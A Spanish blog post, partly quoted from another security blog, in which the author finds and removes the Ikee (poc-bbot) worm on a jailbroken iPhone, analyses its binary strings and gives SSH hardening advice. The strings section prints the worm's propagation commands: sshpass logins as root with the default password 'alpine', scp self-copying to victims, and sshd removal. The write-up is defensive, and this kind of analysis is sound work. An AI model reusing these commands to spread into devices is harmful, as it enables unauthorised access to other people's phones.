jueves, 10 de enero de 2013

Mi Iphone Infectado



Al comenzar esta entrada debo admitir que jamás imaginé tener infectado mi Iphone, algunos comportamientos me lo pudieron hacer sospechar sin embargo pensé que la fuente de los problemas podían ser otros.

Aclaración: Esta publicación esta basada en este post de Security by Default , debido a que en ella explican muy bien los conceptos he citado textualmente el texto original, aplicándolo a mi propia infección. 

Para empezar debo especificar que tengo un Iphone 3gs con firmware iOS 5.1.1 con Jailbreak, ademas gracias a Cydia tiene instalado Openssh para asi poder acceder más rapido cuando sea necesario. Aquí es donde comenzo el problema y los primeros sintomas con este error al intentar acceder por ssh a mi dispositivo:


shinee@Wafles:~$ ssh root@192.168.2.4
ssh_exchange_identification: Connection closed by remote host


Para entrar nuevamente ( temporalmente ) reinstalo Openssh desde Cydia, y me conecto al dispositivo y realizo un netstat:


iPhone:~ root# netstat
Active Internet connections
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0      0  192.168.2.2.50075      186-40-121-209.b.ssh   SYN_SENT
tcp4       0      0  192.168.2.2.50074      186-40-121-208.b.ssh   SYN_SENT
tcp4       0      0  192.168.2.2.50073      186-40-121-207.b.ssh   SYN_SENT
tcp4       0      0  192.168.2.2.50072      186-40-121-206.b.ssh   SYN_SENT
tcp4       0      0  192.168.2.2.50071      186-40-121-205.b.ssh   SYN_SENT
tcp4       0      0  192.168.2.2.50070      186-40-121-204.b.ssh   SYN_SENT
tcp4       0      0  192.168.2.2.50069      186-40-121-203.b.ssh   SYN_SENT
tcp4       0      0  192.168.2.2.50068      186-40-121-202.b.ssh   SYN_SENT
tcp4       0      0  192.168.2.2.ssh        192.168.2.4.32949      ESTABLISHED


La conexión established es aquella por la que yo estoy ya conectado al Iphone, pero todas las demás en estado SYN_SENT indican que estoy intentando conectarme al servidor SSH de otras IPs.

Mirando en /root/.ssh /known_hosts veo que "me he conectado previamente" a los siguientes hosts:




iPhone:~ root# cat .ssh/known_hosts
|1|IM5/6AJJZRC/jXby9zuH3+JomNg=|ZEbDVh4Tnkm22BmjKNfSxCuqkj0= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3IZi+wPcEGhYIgakZz6BqdSz2S/WQT8XsjNlj6GyVEUNAaw/K5sbi+rQua0SjJa4LMEV51bWuqoLnWnBXp4ryfGoNp3AXS7Ct2g6WWwSFvNhk8bcYu9lVOdWXa4b1irCOrMiS7c8wPBm3J6ZpuejrMEu60W1MBSgfpn01Rn2r5VVcMcuTR9Xozx0om3WLCd4Sj9t8+26u4SBCjsdRI6vtt/VXL7UO9J3ZzUQHxz/xSZP9qPjIM5ZfgQhAEtnpaWHt7sc4FseI52EHgweTzBqzueBT4u9ZZz0ypDEV8UzT/wBKX3GtT0Zk5514iDdYvvJ7NdLrY8DdalalP1zjVa7J
|1|62LADsxkMzPd95J8vQmr6WG4ebE=|k23QnHHzWTnfC1BoIdCMb8/1OLE= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKkDCeuGRxySx/Fsibzl2CHpzPor6kKjIukD5H9U4Pa2s/OzrWmEE0Zfpv7vmeh4P65GcYYwr+0gMGHYl5Copo5osGZpUWSCcgqXhmMDicO11/jR9BQ1IT+okQclW9834PpOdUUJcrV1xUGmUM65MWHMA4tdBxQy2LaVwQfr8Uj7X3zg06ZpJ5FNflh8xEy1+/89PQY+Aqf95dCGOr/q4wB86EyVOWsyq0lELJLUXunpFOetHJVgq142l410mzY0zcIThE++QaW0qcwpkmeZdAWdZ3U59H20bVo7dw25c9f3fQterCkzbEKc06LVwml/rsEEntGYp3XT0MXsxaWqrd
|1|U9AXtD5Cb5YSmqzU+QG9syrumN0=|AjLAw2si99bIUAZco9+jUMQcOUo= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChuwhkoRDujqRfSnw3xVhVApCvViTVGQaP5AregOt9WZDkuxl7DqjE3AwUqIBAu3BNvNl1pVMDPO4OA0r2iNnAlAgdGvWznxR+f3o9kMdDdsNj2dkyYAsuvxjiADVWyIPWBMCBxk2ppIfozo1RNY2R5yD7J132P3fy3mfZl2IltRPl0rE1yyOv33yF2FzyC62qUt/3ZkmTK2xjXIjTMiZ7ioGSVGi5sSrCB5UkXBOFlnrGYOdKGvKgATohLhnkODg0AnU/ix+5zO1T5LEVEkosu0OrKYbGfDxpzFZ8iiDOr6DPcZDl3k9nYJ8Mgxp7P+9aENPkI2XcTFaH8FENcmIZ
|1|38E8/JaBSP1DLKQ1VCuJRpNgSzM=|kxqSGonPjkWr3q1NrIrNKp7nDYo= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAurlUELJh8eMMkQ8y0Ia9ln2RP9TP6e0iiaPbObys+phn//XeSRKnGazL3s2TI4oijv+TLY8/IzbBsUUOaTwrj4C4Msfmo+Tn6aI52w9MXd0/SCUxDYBqLlvrY6XsEx6YoL/4sScq2k0R3IS80uGP8cwzt8ZoiqBzNr4YS9ejDoNLlDnsPtEMEgZ7W8bg8YXtxRiSHUX7fvdBfcpLAIylH8mDRwtvJDbT8urJB+WL+Df17BRwTApI5VovXHs/z3tbMlJqdD9ohktQdKD/twjDg74WWmlLjKCRBl43RM0FbbeTo6piSwOZVvLyhyhfHDzQBGSbQ5sZYQlA4Mc+SLOkHw==
|1|pDtkVHDZLvjMIHdxZlPM69CH9V8=|a2xKA83ZznLGcSqb3TSy/IISpDE= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2WDs8rlYtEhGPzCjBcY8fDVX0uYHYfL4Hi1diPZQeVBiZ5EKV9KrqW7fosoeFIaQWGwb6j6wQriErmbS1BoGQNTMvMFljI1goZzrBH/LllEcHvwhsAU3FQP+yV+FrNnqINlXM97OboEG+/A6OaU6oeREaV2Yv4j8zsl9Zaz3+tyDBuiuxMlOIuiGWX51al/ukwC/rnwUK8Pm6yREC0+HA7T5KFPLgeHvYb57BltIGOz+h0VrEWsZ1gxpmDWfdcoutiWnGATaV8YgsvChgo04NIoJjYfza9UwbT1lFzf1/VZwcju3Q+6jPIxeD/Qt3C6h45nUFy/J9qR61QoFZU9eh
|1|4dHZvHCfcdigH/3Veb+pTpGoIlc=|DyG5SoPJLpbK0NybNU/8oMop8bs= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDoigcWpGMIDXR+43NoVnP5cdWMKPXtZtI/jREYY3rII7VFJeKoFGnDREuz4jic9TeuajQgvP4NTv6R9OqpctQubKuRBuUALxC3wzIQ58x12rwkfgkvt0iT330pXwTOzrxDxR+uiOHT0sbOD9WWQVTOTxxUjfiFHLqm0LfYw3o1/obVZwF36TuE3l8FpRyrOqH73Blvg0VEbIFaLxzAmjdRC6KD95vZSQJWqQLD+xEBirKDDdNzqtQqB6cGmVP4kW/0onpBfxLd7Ef4g5H2hF343SfE4htmsfPKS0pBaB0BYiOLmkMcMpLZOWEU1dyEb1301SGK3A7zlMYix0nEl/+7
|1|QY5raMn+9bGBufyU+E8hbKO8vvU=|9pWEBfKQ+BO+zj5k0h3eMoh6E7E= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA1CgdzFs6S1c2iZ5G0jaHYfZAhAheCJX8CBdIu5rEjBjhk4qo8Y4c7ubysZfjRrR000OekqakcBt6IoHgPSDHd6NP+ULPclpNAo2kppt7vVN/VqEEiixIfnuq9IfTN/lVStRFqLG/q+mijmRH0BGiOUbtxpiUs9jSfrOmpIV2GZpSgdN6D8Mi67Vo8yl6/tMeUcqCyeUvf+UbqOghywqMFOBmX7NerwomN3lJfIuYQZIIeHXtUs85fA+F0lTei1CHF1fRd1u6lX4FngE5W7FMnzB85tf94yo2soo6yTzJZe2t1NnfmsVdxcQebWzWVAZe2ejoII4m+vONRQ2xagvDIw==
|1|rMGl29QOTuSklPmn+lLhdWr/7VI=|06LXRtMURyzgeGGv6Ld3y8x32cM= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6TpZDoO+L+KJQJNdmTRLlCUttHqjtSmZQnX4R84sWh4xPQV1T18eY6kmLan/4rlD6d07zsuA5CPL3ZIzLG+aAyl+El8VNv07cmLLGJDIr1o3ES1M8I+X3EYdWmhU7laxlkG9C368X9ODq9h5U6LNlVxT0g9jfcYbYzKKM26Dz0RWpOnusld0yjavc49SdFlGCItO8TofEkUjWwLzTHiKuj8mrGE4rNE13fYRbCuO1GHpPmeyVgRlfyuwoByk85+C0z1eacxYrMzvE/TMVjuVxok6w/9m22p9nbxZ25t/+dEW1/4cphre3n7QRMYd8zp/gU7EwddYG82w/4P9sgCdZ
|1|x/TGLaOJewAaPMGmnrh5qS37EnA=|C1Xz6kPdSLq0BM0BBrvoPQsi6pU= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAtqTfzBhaVk1UG/TF+zotlk4IFoS7by/LfmJxjfot6O8WtcOZhZan3uZJyHg/KeFN17uhfij/+sdZyXGIk5Dsdc3pN1DfZ1/TekXsCEs6CGNHrFIhqdtwLLHdxF+hBr1hgPLm6onq1ZUJiOAAlDUqDQX7uXxXjRCxRuXcBduY4/52tuLGAdn8WDqZ3Uc/9TFGbZqqRtirX32YvvSONBuH8+ALI9NBoMK9z+siS2b8G6Gr0Sc37DjHHJaWauHKsucKtU4srz8K4fPPKt0KkG99RSKhFqCP+AX58C50YLOzU4cU5PiYWABZLTNhJ7TkaPKakZ+QcVB0j+R/koAfkOj5
|1|lefbEHSMLKN4q7PTTBtaucvl8ws=|mc1klabvJZOZTLf6ISg5u4VWR3o= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdkjHQ6kLA0rQu7U7iPeijwSC0u7vruEgGxlU7O0maL2laRsdXjtpfwRrnFjW/JMcWXgFy1gs+edXyhm4121hsOxWOGofIt1BnrObCEFjG4aQLvGdl0CVK/iYQDEZZ4SP8Qbn7V5BajSQqXpUzYsMcuqspe8yttbs/D/r33jmM/iBQe38LfrzeWgX9SV4zQVgoVSmzJDlR0vta0FLVqOolLNiTPLd078W7oKU1eGZL+A0KV2uxynocKMlZmwDyQ3IndQLoBbPnmxC1MpgYVE4EE85cu5DTOCMi/O1Szy4wNmsCmOhpFin6uIjelg6or1ZIcXQ6nXIhQfmxeGqSOyub
|1|gfCuSf/cCAcOO/ZasMpoU9IsKfA=|Fw6xcqJvrd/U+q9UXOBDjOIMMmc= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChfqaBH5U+ujylJztHkYurA9eCUjiTdg4qRF0P5wJfoJP3nQCCD6dIwc38FCWB2u8H1TxggdJmqxG18rpShSUb83vMqQGI7jK7G8t2iZpm8E0/Px2/m0MF2tSALd3NSIvZALt9hITTd28nLt3WwFMVTtSQdutinzgA5O6Bu76k82Ph59NimTalSF3VEYx3BVhfpIXwqmGW11V08zr7QvzXesE3dbpXUJ2CdUh3DGXO6ldeT4kgO5H3+wm8LS4AfhIbUSnHBjAy+5SproY/vnrtp21oNupKZ86yjA73yGBnk1DBIqCt0RkMGIJh7tthHLT8hZU3M7/s+Hs+zQQ3PY9p
|1|QqxlcaFS6fyesiEl7DXjnDtX2Vw=|EP4nZ5y0RlWUnPePu8GuIU0uHFg= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDglJXorb4gFkyHkbNnqXPqU/8nycnES8LJxLXUosznhhxEj6vBIjJ3QiLTZQrtAWVwBMOsdfeRN1R5gVQ9z3pCLiVGsY8L1qofEzO9Oh/FtyzOS4YtPMe4WdJr8yxNYNSK3P0oWCNPfV1gniCTd6xrb5a7gXtpX44ggmHxBxF6N+jfFoCYosUXMXxxsotEfgifV0Wr71AJXIUHPHxYkYi0NRdav9W9gpG3NyDcHewxxZUcdTaOwaHLjxdOLTHLjjazXIeeQiv1y+/FvvWpofgFJkWUjU3rVkgEWeGl6BA4yPWg+pFDFcmKhOHC6adm5PmIK6sQG+YXSALpLsQ8G6E9
|1|nZj5dL69GL84PYdujmHGOucm5AA=|0mkAdlmvVSeCUQQGy9dGAmyVbwQ= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDMVdWZ6MoI1NYW1Z753prTv2TBtetgLuHIAPdYJJC6Xw4X2N9eaXaNPqVwYuPK3W2gxV+XAzGuQC0rW2p3H00mFlBVd+tRFxL+r6xEIFqBC/Vnh4+dr3KgDPc+w0WgCV8jAWkG8YUpAaXy5BQD2PtFoP8beoEWBatRyTirFMi5d7//5VEbTbe2DbJLvFZiXUgeWf+cCbFp2GCj8zFtUvXNxu5SVEoSG87gWEMF5/u5lCGYzDeHNq/QRVMD8hCOpnQ7SCgPhSB2B0GXZqkMvOgDp7g7bvEp83FI0ohfyEo8wd/fYABBBgjUBGT5XKYWSa1T/8VC7vyes5Sjq+mzSPRT
|1|lYIRRtryumLw5Qqk2FV2AhcM7Ec=|p7Tf2n+0ywcRyFZXutZQ20XcmdA= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1UeyngQNEQNQ3IQAsPw8KKGykCE8w19LG+TvUudDlwGSH+B0KZTa/gz+n1Zezl2scuNkS9BSGVUdyCcMgBYyK5wB9VPgaoBKt0hd3m9gG6RBTjklv5ScwlowaVFfrO8RGRTjCXwNYUBJH+hoKzlbkQ+IaHqHo36UsCmwdhMeRmXxRze2IvRo4EQiTRvB0Dx7+syFmFReR5NO+1M/aTFOaN0US24LJ7qZ5UBBSxYIrJ6ihFE/XA1B2sWmnxoKVitYFXquCair6kQ2zKgbP2e/jE6Zm9UHSuH9jZUUA67As4aeWUrG5zf8Ct2xxhEw3L+1VWBWr0hC0TYMx4kxyhIHP
|1|fptvQLCbHBNg1zqT4mPVABThSA0=|deIuWKY8i/L9dHwRZSlCl4PKw50= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxQJ4+N0f1+lG/pPMkqwZKa8jMm0EC/UzKUqZMkHp/HgJYBmKN+OSq2imviKf9nnaPIOF1A8mxKGiciZYEX0sUmn/CubwaIZstSYbt6QHD7+iWh/0ha2NZuBHsRrW8KpApt5JLPBeUz7wZKncfLZfijqL+OgzEW4DrX5vxpsvRx8fmj+wFoqatGDlj5VYU8Q4WInJRZbKTAwaghvsboNHTddyNnCKRbAxVi7md43xPYp2SkoIeyYyV4rBEa5cW6ai7HZRya9M2BgwfqpDfLvqJn65Yb8gkrA5ZvncItrSMZtpAjHVDmTsfgncPuIbAocGXMUO2XAlRW+m/h2LK78xJQ==
|1|TTJOG8QzgsBCwdTsPzC+iiY1dig=|uCvq7/KZR/S72/gfVedXldYX2a4= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDjKHQy+4Fzf83Y2KVHBW76qBzd/wXY0n7KeOj82sgIL+gpVruAQzv7iB6NOnauOOSREiplKDGgxpoF0ZDMGJEDVt9IarL8iBnpUEVcVFOwZuZjkeGX5vpv85cCukUZcPIMTYhAs5l2YpQ5392YxDp7OKb0QXU3k2nmikoGJfLTltxZBpulRKpkCUWkkd0NgxvQEt2oqpsLX8yKFqvvuPHvj4BUZNoxS0LXBQa4lZHv583cl4aFuGMu0XGt141FmdAMEvVE85e3H1Qj7jjAbJr2cuJd317ATcpGFLclmvM7BI0ibVTvyNG7QYVgYtMLXteSyIgWfsIvnEdfGHqfLueL
|1|z2m9fYtUH6DPO4Ab3IM9RdgSaEg=|iL2t8s6q48uiJkS5MLe9nV5D0sg= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCrvIwyXCZW+axDjrKc11IMl93aCw/qdtvOlnwebkOvUnUGrkKuWNtg2Nhl9g6bcIQa8VBJnUxElFzuPFDNX/xi7kiHaREPKq9mJgGFmYRw+ULfI+uNnrs3JboCbpMrPKys4H/dKehDenhFTw4Su9cOiXRvqp4SUus4R4L/SHalEXmgHOENgX6uJzV6w/5KrT7DUjOOgqYOvKPno0yhI0wviva5Ar+Cupo1VRrh2965vDrRhLcxyCHXgN27dgieXMYoPBNgWaI9ui/QyPB4iBt/38UavloegOaHC4T7Iwy1ajIShorbQC1cPkmA3zP/GToZsuRA0ub+5aCMNJIzLqpX
|1|chQtj+qS9ki/Oy+Uffh2voA5qUY=|zDzeLUej9nKWzWUI94P5S27GE7Y= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAnsgAOZxON82AD1ko5BcJGH9Ps6XhWxNQp4CWdZ+0l7iv0l9RogAQ8Ri6Nr/emdwtpijgFmXJgti+av5rOA42SU35GJotX6NhQ4Ll7pjxSkDm8THbsyqLw84L6LEp/z0iXH+vEA+8POQTGWmsjWup77MDRaxxRe0mu8pY5anTxOsyExWMiCSVTuBztYYLQK/crr/aTA6/L4wDdj1ysKEg6UQ99Y7+wOTMmjRWULYxrWIZh3w9LQO3/nxOXIw4Seko7hyRZJnA7ubMmO6GmfG/hsK3EAc0EzS5lu4O9t99Py1L9IDO4fg+a+NPPNMgPW+cyVAsYy9Tj4dWrO6tUzDUEQ==
|1|ba2ggAZGQWHhghVflrnkxmdnZ+g=|BK12/pAeHmMhW7zf55Lr9C8SNnk= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2WDs8rlYtEhGPzCjBcY8fDVX0uYHYfL4Hi1diPZQeVBiZ5EKV9KrqW7fosoeFIaQWGwb6j6wQriErmbS1BoGQNTMvMFljI1goZzrBH/LllEcHvwhsAU3FQP+yV+FrNnqINlXM97OboEG+/A6OaU6oeREaV2Yv4j8zsl9Zaz3+tyDBuiuxMlOIuiGWX51al/ukwC/rnwUK8Pm6yREC0+HA7T5KFPLgeHvYb57BltIGOz+h0VrEWsZ1gxpmDWfdcoutiWnGATaV8YgsvChgo04NIoJjYfza9UwbT1lFzf1/VZwcju3Q+6jPIxeD/Qt3C6h45nUFy/J9qR61QoFZU9eh
|1|vX6S5oPp0OpfKZpnxryWtt4IlfY=|8DRLX6WICWDSOvz356w6ZIu9ZIE= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdkjHQ6kLA0rQu7U7iPeijwSC0u7vruEgGxlU7O0maL2laRsdXjtpfwRrnFjW/JMcWXgFy1gs+edXyhm4121hsOxWOGofIt1BnrObCEFjG4aQLvGdl0CVK/iYQDEZZ4SP8Qbn7V5BajSQqXpUzYsMcuqspe8yttbs/D/r33jmM/iBQe38LfrzeWgX9SV4zQVgoVSmzJDlR0vta0FLVqOolLNiTPLd078W7oKU1eGZL+A0KV2uxynocKMlZmwDyQ3IndQLoBbPnmxC1MpgYVE4EE85cu5DTOCMi/O1Szy4wNmsCmOhpFin6uIjelg6or1ZIcXQ6nXIhQfmxeGqSOyub
|1|+QiwFWfhP9lb1GuBCBS0KCAlKsc=|SMs9/PS5EeX/Ybap3UHwf++7iYg= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCiHp+AXQXQyM0oIpsck65skUfoP89DagJfHi4NM1jNc1K8/s2I4S89ktqVpBJGrwUZARo3qg/QJrtoO3BEdQW5Mdym3OJnT2lcTmFmhh8tgLTllMoiZTKLVbDjDNT476R/w4oxsxDZSL5sGVexAiv8+WKbtgwEVwAV0OHsD2mHZjo5eYpqB1JZL+i+0Zl5doeMejgzEfhYdjYI2pZER1ZQrqJhSYlnkG1AUZw87kdYE3W2ievwwxJ4Yxu5AvxIVydKc5p3p0MP+hX8n/zZTbJFZtOpGJ7IVMqPeNjQJzgGiiJ7BBi9woX+h0OqkQ1acl9OTmEqCI9yxQ9yPXM4BCKj
|1|CsHezG/fJi5r2sbbP1B3v/7QY/s=|cAVngYbsb5QGb5Wt8cRJUEqJsY4= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHrDv1U2iNz3pDJsxh4wOxtySHLt9eyp78GHRA+CM3w459pxbtsa7yrCbCz7UuNuY9296cewSh/NWXHCtUiWHghnD2v4zbdDZ6YNvOq5ZBxbUQPevhrtb2hg31Mk/ei1/MDSo3LTuf0OhE1Rf+rjX4MwNuEZQ4Il84YSvF5w8zD19q0wL3zNiqJdevehvuLM6bVuQVNNHJHLhBP1x2BjSqZWIvMqi00yR5HT0+bqJekm2rFPFj+0IGXGrT4RD6fXqVWtrQUjnsGAEzZib30ErJMVI18ARbNQtkHFtsxBy31RGybde4qcAGEQRqNi4yqJZb2mHRcmg9U1+R0zEpgVtl
|1|oWDRINPm6UfhiFOddlvNlFHhLwo=|0JZ6b3i4zFiN0k9IjwmhMkLY5r4= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDtNtq7e0hCM6qmi+AtLdJaGsZ4kDXzRqyEEwChcPddZGCa+FlPeWktVJNLiGuLULaCjJNzkx6vsN4FV+HRO8x6z8cekR1kzoMcOGTq+GHrGABFmWRYW8MoDnkpnoUblCCnVW03zCiYepB7K0mp5lQ4jpvJrGSXTmmzN5XIGjMS1qsC+KqBWIMgJIhNRwj9a/JrV2jy9SSEp3G+miWXbs+NPYqle7sYVLt7GtE8naj/Y8GAvWACvoXMkaCACxkCZMeZBSSbxLkp2qidLMBvtSWmzzVDEZAHaNQIbzPJcqHpRlygkweL29dz3XkaSOUmGPJV8Rulkk/mHkCjW2d/eKK3


No me he conectado a ningún servidor SSH desde mi iPhone, por lo que ya empiezo a confirmar lo que está pasando. Buscando en los logs doy con algo tan sospechoso como esto:
iPhone:/var/logs root# tail -f AppleSupport/general.log 
2013-01-10 09:35:53 -0300,109,8228FBE2-733A-4BDD-B0EB-0C40A067D169,100,poc-bbot,KERN_PROTECTION_FAILURE at 0x00003883
2013-01-10 09:58:51 -0300,109,96ACB772-1F78-4F6A-985B-E1383332DD89,100,poc-bbot,KERN_PROTECTION_FAILURE at 0x00003883
2013-01-10 10:20:56 -0300,109,17EFADF9-46C2-40A1-94E2-B4F4660E6231,100,poc-bbot,KERN_PROTECTION_FAILURE at 0x00003883
2013-01-10 10:45:17 -0300,109,3AC9689E-DEAA-4D56-AF7F-29A5B16029AD,100,poc-bbot,KERN_PROTECTION_FAILURE at 0x00003883
2013-01-10 11:09:13 -0300,109,586ABA4F-4D5D-44B0-A635-AF20303F4E1D,100,poc-bbot,KERN_PROTECTION_FAILURE at 0x00003883
2013-01-10 12:03:55 -0300,109,7A8E9303-534A-4F44-A4D1-125EB51B276F,100,poc-bbot,KERN_PROTECTION_FAILURE at 0x00003883
2013-01-10 13:00:02 -0300,109,E5D8E2FB-E994-491C-B8CA-FAF26ADA877C,100,poc-bbot,KERN_PROTECTION_FAILURE at 0x00003883


Cita Textual: "No dispongo del comando "ps" en mi iphone, por lo que no puedo buscar qué proceso me la está liando. Sin embargo, al ejecutar "top" encuentro un simpático "poc-bbot" en el top 5 de procesos usando el procesador de mi iPhone. Googleando por poc-bbot, veo varios enlaces que indican que, efectivamente, tengo un bicho en el iPhone. En este caso se trata del virus Ikee, un viejo conocido (por no decir el primer virus existente para iPhone). Además cambia el fondo de pantalla por una foto de Rick Astley, tira el servicio SSH y se intenta reproducir buscando conectarse con root/alpine via SSH a otros dispositivos iPhone. Antes de ejecutar los pasos para borrarlo, me copio los ficheros propios del virus: /bin/poc-bbot, /bin/sshpass, /System/Blibrary/LaunchDaemons/com.ikey.bbot.plist y /var/lock/bbot.lock. Curioso pero los ficheros /var/log/youcanbeclosertogod.jpg y /var/mobile/LockBackground.jpg (también referenciados en los enlaces que encontré en Google) no existían en mi iPhone. Efectúo los pasos de eliminar el virus, borro los ficheros y hago un kill -9 al proceso poc-bbot que encontré con "top". Reinicio el iphone y veo que todo ha vuelto a la normalidad. Malware eliminado! Sin embargo, ahora vamos a analizar los ficheros del "bicho" que guardamos previamente. Sin embargo, ahora vamos a analizar los ficheros del "bicho" que guardamos previamente. com.ikey.bbot.plist"


Label
com.ikey.bbot
Program
/bin/poc-bbot
UserName
root
RunAtLoad

KeepAlive


 


Es un script de arranque típico en sistemas Apple que arranca al inicio el fichero /bin/poc-bbot

shinee@Wafles:~/pentest$ file poc-bbot
poc-bbot: Mach-O executable acorn


Haciendo un strings al fichero que estaba en /bin/poc-bbot vemos lo siguiente:
__dyld_make_delayed_module_initializer_calls
__dyld_mod_term_funcs
%i.%i.%i.
/var/lock/bbot.lock
getifaddrs ******
getnameinfo() failed: %s
0.0.0.0-0.0.0.0
pdp_ip0  ******
%s.%s.%i.0-%s.%s.%i.255  ******
I know when im not wanted *sniff*
IIIIIII Just want to tell you how im feeling
192.168.0.0-192.168.255.255 ******
202.81.64.0-202.81.79.255  ******
23.98.128.0-123.98.143.255  ******
120.16.0.0-120.23.255.255  ******
114.72.0.0-114.75.255.255  ******
203.2.75.0-203.2.75.255 ******
210.49.0.0-210.49.255.255 ******
203.17.140.0-203.17.140.255 ******
203.17.138.0-203.17.138.255 ******
211.28.0.0-211.31.255.255 ******
58.160.0.0-58.175.255.25 ******
awoadqdoqjdqjwiodjqoi aaah!
Checking out the local scene yo
Random baby
%s.0-%s.255
Lannnnn
VODAPHONE
OPTUSSSS
Telstra
%i.%i.%i.%i
Oh a sheep!
sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'echo 99' ******
alpine
Error is sshpass there?
sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s ; echo 99'
sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s'
sshpass -p %s scp -o StrictHostKeyChecking=no ./%s root@%s:%s  ******
sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'which %s'
cp /var/log/youcanbeclosertogod.jpg /var/mobile/Library/LockBackground.jpg ******
rm -f /usr/sbin/sshd; killall sshd    ******
uname -n
rm /bin/sshpass
rm /bin/poc-bbot
/bin/poc-bbot
/bin/sshpass
rm /var/mobile/Library/LockBackground.jpg; echo "
 - Removed old background"
/var/log/youcanbeclosertogod.jpg
/var/mobile/Library/LockBackground.jpg
/System/Library/LaunchDaemons/com.ikey.bbot.plist
launchctl load /System/Library/LaunchDaemons/com.ikey.bbot.plist ******
rm -f /Library/LaunchDaemons/com.openssh.sshd.plist; launchctl unload /Library/LaunchDaemons/com.openssh.sshd.plist
killall sshd  ******

  • Cita textual: "He remarcado con ****** aquello que más me ha llamado la atención:
  • getifaddrs -> Qué IP tengo asignada ahora?
  • El interfaz pdp_ip0 es el que por defecto se levanta en las conexiones 3G en iPhone. -> supongo que será parte de la llamada a getifaddrs (pdp_ip0)
  • %s.%s.%i.0-%s.%s.%i.255 -> Del direccionamiento de red que tengas en el interfaz 3G, crea una lista con todas las direcciones posibles de esa red.
  • Diferentes rangos de red públicos de redes de telefonía móvil de Australia. Además está el direccionamiento privado 192.168.0.0/16, que imagino que también se asignará por parte de algún operador en Australia, al igual que hace Movistar aquí con direccionamiento 10.0.0.0/8 (al menos me he encontrado de este tipo de direccionamiento en el intefaz 3G de mi iphone un montón de veces)
  • sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'echo 99'  + alpine -> ¿Está claro no? Conéctate a la IP que te toque en el bucle por SSH con contraseña "alpine" y si ya te habías conectado a esa IP pero ha cambiado la key del servidor, añádela al known_hosts sin preguntar (Lo que interesa es reproducirse e infectar, claro está). Escribe un "echo 99". Imagino que así vemos si hemos acertado o no con la contraseña "alpine" de ese Iphone
  • sshpass -p %s scp -o StrictHostKeyChecking=no ./%s root@%s:%s -> Copia con SCP los ficheros necesarios para reproducirte en el nuevo iphone víctima
  • cp /var/log/youcanbeclosertogod.jpg /var/mobile/Library/LockBackground.jpg  -> Pon a Rick Astley y su "Never gonna give you up" de fondo de pantalla
  • rm -f /usr/sbin/sshd; killall sshd -> Borra el servidor SSH del iphone y mata el proceso para hacer más complicado el borrado del propio "bicho"
  • launchctl load /System/Library/LaunchDaemons/com.ikey.bbot.plist -> Ejecuta lo que diga este script (típico de arranque en plataformas Apple) Pon el bicho a funcionar
  • rm -f /Library/LaunchDaemons/com.openssh.sshd.plist; launchctl unload /Library/LaunchDaemons/com.openssh.sshd.plist -> Borra el script de inicio del servicio SSHd y tira el servicio actual. -> Digo yo que ¿esto tendría que ejecutarse en orden contrario no? Primero tiro el servicio con el script de arranque y luego lo borro…
  • killall sshd -> Mata el servicio sshd actual

/bin/sshpass es un binario que se ejecuta como helper de poc-bbot para conectarse a las posibles víctimas y copiarles lo necesario para seguir infectando iPhones.



Conclusiones

/var/mobile/Library/LockBackground.jpg -> No existe en IOS 5.1.1 por eso que no me enteré que tenía el bicho, al no haberme cambiado el fondo de pantalla por el majete Rick Astley. Este virus era efectivo en versiones de sistema operativo de Iphone inferiores a la 4

Me vino bastante bien descargar desde Cydia una herramienta llamada Sysinfoplus. Te permite, entre otras cosas, listar los procesos que están corriendo en el iPhone así como información de conexiones de red. Me valió después de haber desinfectado el iPhone para comprobar que ya no existían más procesos sospechosos, conexiones salientes raras, carga de procesador del iPhone, etc,... Es gratuita y recomendable si tienes hecho el jailbreak

Si te instalas OpenSSH para tener acceso por SSH al iPhone, yo tendría en cuenta varias cosas:
Instala OpenSSH con los servicios 3G y Datos deshabilitados. Hazlo vía wireless.

Conéctate al dispositivo y cambia inmediatamente la contraseña de root (alpine por defecto) por algo mucho más complicado.

Haz que el servicio SSHd escuche sólo en la interfaz privada. Lo normal es que sólo lo arranques en algunas redes muy definidas (en mi caso la de casa únicamente). Para eso añade la línea "ListenAddress a.b.c.d" al final del fichero /private/etc/ssh/ssh_config. Donde a.b.c.d es la IP del interfaz wireless que asignas a tu Iphone en tu red confiable.

Que no arranque como servicio el SSHD en el iphone sí o sí. Es preferible tenerlo que levantar manualmente cuando quieras conectarte. Así minimizas el tiempo de exposición. Para ello ejecuta en consola del iphone: launchctl unload -w /Library/LaunchDaemons/com.openssh.sshd.plist

Tened cuidado con el Toggle-SSH para SB Settings, puesto que en cuanto lo utilizas, habilitará por defecto que se ejecute al arranque! Al no ser algo que se use muy a menudo, es mejor no tener la extensión de Toggle-SSH y habilitarlo/deshabilitarlo desde la propia aplicación de OpenSSH manualmente.

